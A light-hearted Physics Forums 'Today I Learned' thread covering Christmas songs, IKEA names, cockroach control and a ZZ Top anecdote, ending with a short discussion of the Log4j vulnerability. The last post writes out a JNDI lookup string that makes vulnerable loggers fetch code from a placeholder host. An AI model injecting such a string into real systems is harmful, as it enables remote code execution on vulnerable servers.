Today I Learned

• Thread starter Greg Bernhardt
  • Start date
In summary: Today I learned that Lagrange was Italian and that he lamented the execution of Lavoisier in France during the French Revolution with the quote:"It took them only an instant to cut off this head and a hundred years might not suffice to reproduce it's...brains."
  • #4,061
TIL "whamageddon" and guess what, I had to google "Last Christmas." I have no memory of ever hearing that tune. TIL, I am a lucky guy ?:)

DennisN said:
A very funny game: Whamageddon 2021.

The objective is to go as long as possible without hearing WHAM's Christmas classic; "Last Christmas" (between December 1 and December 24.

Physics news on Phys.org
  • #4,062
gmax137 said:
TIL "whamageddon" and guess what, I had to google "Last Christmas." I have no memory of ever hearing that tune. TIL, I am a lucky guy ?:)
Yep. I and my friends play every year. So far, this year, I have avoided being sent to Whamhalla.

Likes DennisN and gmax137
  • #4,063
DaveC426913 said:
sent to Whamhalla.
There to await Ragnarock, amirite?

Likes DaveC426913, DennisN and gmax137
  • #4,064
gmax137 said:
TIL "whamageddon" and guess what, I had to google "Last Christmas." I have no memory of ever hearing that tune.
I am truly stunned!
:))

• #4,065
Lemmy with Chuck's Rudolph is a good antidote.

Likes DennisN
  • #4,066
DennisN said:
I am truly stunned!
:))
I guess I stopped "keeping up" with most contemporary music around the time MTV stopped playing music videos.

It's weird, being the same age as old people...

• #4,067
gmax137 said:
I guess I stopped "keeping up" with most contemporary music around the time MTV stopped playing music videos.
I think I understand. I belong to the early MTV generation, which means I was in my teens when MTV reached Europe. Me and my friends quite liked it (well, at least when they played music genres we were into it). But I remember there was a gradual shift, some time around mid/late 1990s if I remember correctly, when I think it started to go downhill.

Regarding "Last Christmas" I actually can't say I dislike the song so much even though it's sugary sweet and has a distinct 80s sound. But I'm still fed up hearing it since it gets so much airtime during Christmas times. :smile:
I listen a lot to radio, so I wasn't expecting to survive Whamageddon 2021. :smile:

• #4,068
jtbell said:
Today I learned that IKEA's products are named after places in Sweden, and the Swedish tourism board has launched a campaign based on those places:

Discover the originals of Sweden

"Welcome to Bolmen: More than an IKEA toilet brush"
IKEA furniture name or extreme metal band?

http://ikeaordeath.com/

• #4,069
Who/what is "Wham"?

TIL today is that crows are jerks. I found an apple core on the hood of my truck this afternoon. Looking at the video footage from my security camera setup (I have a problem neighbor), I saw where a crow was eating an apple on the roof and dropped it onto the truck. Though to be fair, all I could see was its head bobbing up and down as a shadow on the windshield.

• #4,070
gmax137 said:
Indeed you are a lucky guy.
'All I want for Xmas is you' by Maria Cary pips it though. I feel violated every time it comes on.

Likes fresh_42
  • #4,071
pinball1970 said:
Indeed you are a lucky guy.
'All I want for Xmas is you' by Maria Cary pips it though. I feel violated every time it comes on.
Guess that is the American version, and Wham the European. Not that you cannot hear Carey here, too, but she normally comes in second place.

Likes pinball1970
  • #4,073
Today's date (12/11/21) is also a palindrome.

Likes collinsmark
  • #4,076
TIL if you type “count” accidently leaving the “o” out, the resulting word gives a ”jerk” in its place!

Good job I always read again after posting!

I Edited VERY quickly.

• Haha
Likes Tom.G
  • #4,077
Flyswatters are great at killing speedy roaches. Sneaking up on a roach to smash is near impossible. Flyswatters offer reach and aerodynamic speed.

They are a fantastic invention. Better than Raid (which gets the material sprayed on all wet).

• #4,078
kyphysics said:
Flyswatters are great at killing speedy roaches.
Where do you live that your cockroaches notice flyswatters, let alone kill them? :oops:

• #4,079
DaveC426913 said:
Where do you live that your cockroaches notice flyswatters, let alone kill them? :oops:
Where the person lives is less important than the effectiveness of the flyswatter in killing cockroaches. I have used flyswatters to kill some cockroaches, and they do work. You still need to be fast. The bugs do notice something moving and if you're too slow, harder to swat them on-target.

• #4,080
symbolipoint said:
Where the person lives is less important than the effectiveness of the flyswatter in killing cockroaches.
I guess my point was, I've seen cockroaches that can shrug off being stomped on. I thought perhaps you lived in a land where cockroaches are made of lace and cotton candy.

• #4,081
DaveC426913 said:
I guess my point was, I've seen cockroaches that can shrug off being stomped on. I thought perhaps you lived in a land where cockroaches are made of lace and cotton candy.
Yes and no. If you bash a roach with a swift flyswatter move, you can bash off a leg or two. I will say that I use mothballs as well. So, they are probably a bit poisoned already. Normally, they are very fast (one of the fastest living things on Earth). But, mothballs slowly poison them and they start slowing down. They may be extra vulnerable after being poisoned and a swat or two with the flyswatter stops them. Then, I take a paper towel and finish it off (squeeze it to death).

You are correct that many (perhaps not all, however) roaches can survive being crushed. I've had many experiences bashing them with paper towels only to lift it up and have it run off at warp speed.

• Haha
Likes rsk
  • #4,082
I have worked with professionals to remove roaches:

Baited poisons work well with roaches (if you don't have pets or children that might get into it.
You can get sticky traps or make them by balling up very sticky tape, like packing tape. They stick there are dry out of starve.
Remove access to places they hid and breed. They like dark and moist places. Seal seams in walls tey might be hiding behind.

They are difficult to crush and can squeeze through very tiny cracks.

• #4,083
Also Boric Acid powder works quite well against roaches.
See: https://www.physicsforums.com/posts/6302541
and the two posts that follow it.

A few years ago, we had an infestation that was a bit hard to localize. We finally found them in a gap between the kitchen countertop and the plywood support under it. We used a bellows-type puffer (sprayer?) to blow Boric Acid powder into the space. After some time (a couple hours?) we had half a dozen or so dying roaches out on the floor. (The wife didn't much appreciate that part!) Don't know how many didn't make it that far, but they haven't returned.

Another tip:
If the beasties appear generally rather than localized, they may be getting in thru the gap between the wall and the floor. I know, you can't SEE any gap but it is usually there. Sprinkle some Boric Acid where ever a vertical surface meets a horizontal one. Severe cases (like in the Arizona Desert), some gets sprinkled across all doorways too.

Have Fun!
Tom

Likes BillTre
  • #4,084
I have seen roaches from 0.5 inch to 2 inch. I have tried swatters with 1 inch. The swatter merely slows them down so you can stomp them.

• #4,085
caz said:
I have seen roaches from 0.5 inch to 2 inch. I have tried swatters with 1 inch. The swatter merely slows them down so you can stomp them.
They make my skin crawl. That post made my skin crawl a little bit

• #4,086
pinball1970 said:
They make my skin crawl. That post made my skin crawl a little bit
Quick, somebody get a swatter. He has roaches under his skin.

Better now?

• Haha
Likes Tom.G and Frabjous
  • #4,087
jbriggs444 said:
Quick, somebody get a swatter. He has roaches under his skin.

Better now?
Took my mind off roaches yes.

• #4,088
When I lived in Florida we called them "Palmetto Bugs." Tennis racquets were sometimes effective. I think they would grab a flyswatter out of your hands and use it against you :bugeye:

• Haha
Likes rsk and Borg
  • #4,089
TIL Brain surgeons are about the same level as rocket scientists for the smarts

A fun article in the xmas edition of the BMJ

https://www.sciencealert.com/resear...rgeons-against-each-other-in-a-battle-of-wits

Would you say rocket scientists have to think as deeply as cosmologists? QFT/QM guys? mathematicians?

Sheldon rated Engineers, geologists, biologists way down on his serious thinker list

Perhaps I should start a thread?

Light hearted of course.

Likes BillTre and gmax137
  • #4,090
gmax137 said:
When I lived in Florida we called them "Palmetto Bugs." Tennis racquets were sometimes effective. I think they would grab a flyswatter out of your hands and use it against you :bugeye:
Yeah. Ran into these guys on a trip to Carolinas where we stayed in a cabin. They're huge, but soft.
Domestic-grade, not military-grade cockroaches, IMO.

• #4,091
In the South you learn to be somewhat relived at the big 1-2" American roaches as they come in from outside and you hardly ever see more than one or two at a time

The small German roaches breed in massive numbers in the house and are a much greater problem

Likes BillTre and DaveC426913
  • #4,092
BWV said:
In the South you learn to be somewhat relived at the big 1-2" American roaches as they come in from outside and you hardly ever see more than one or two at a time

The small German roaches breed in massive numbers in the house and are a much greater problem
Every one ignored my very deliberate, justified and amusing Segue from insects to something else.
I put effort in.

• Haha
Likes DaveE, Frabjous and DaveC426913
  • #4,093
TIL this story about Billy Gibbons (from ZZ Top):

Billy Gibbons: “We never had anything but admiration for the blues giants,” “Dusty, Frank and I, we shared so much of the same influences, but we never said that we’re going to rescue the blues. We didn’t do that.”

My dad was an entertainer. When I was seven years old he said, ‘Listen, hop in the car. I want to take you with me. I’ve got business to take care of at the recording studio.’ We went into the studio, he parked me in a chair and said, ‘You’ll probably like this, they’re recording a band. I’ll be in the office if you need me…’ It turned out to be a BB King recording session. So, between seeing Elvis Presley and BB King I thought, ‘Man, this is it. This is for me!’”

“50 years later, B.B. King was being celebrated by a group of musicians,” he continues. “They were putting a CD together, a tribute to B.B. King with him performing with a host of different entertainers, and I got invited to be on the record. I showed up at the studio and BB said, ‘Do you know the song we’re going to do today?’ I said, ‘Yes, sir. “Tired of Your Jive.” I was there when you recorded it.’ He goes ‘No, that was 1957.’ I said ‘I was there’ and he said, ‘You the little boy sitting in the chair?’”

_of_ZZ_Top_performing_in_San_Antonio%2C_Texas_2015.jpg

• Haha
Likes pbuk, Borg, collinsmark and 5 others
  • #4,094
https://www.yahoo.com/finance/news/...acting-nearly-all-the-internet-222332341.html
A major cybersecurity vulnerability is impacting nearly all of the internet, sending everything from financial institutions to government entities scrambling to patch their systems, before cybercriminals and nation states can launch cyberattacks.

Known as the Log4j vulnerability, the flaw impacts a piece of open-source logging software that allows developers to understand how their programs function. The idea is to help companies understand potential bugs or performance issues in their own software.

But Log4j, which is part of the software offered by the open source Apache Software Foundation, can be exploited to allow attackers to take over the computers and networks of any organization running the program.

• #4,095
It's surprising how obvious the attack method is and how long it took to be found. You basically write "please download this file" in the text to be logged, and it will do that - intentionally.

${jndi:ldap://example.com/maliciouscode}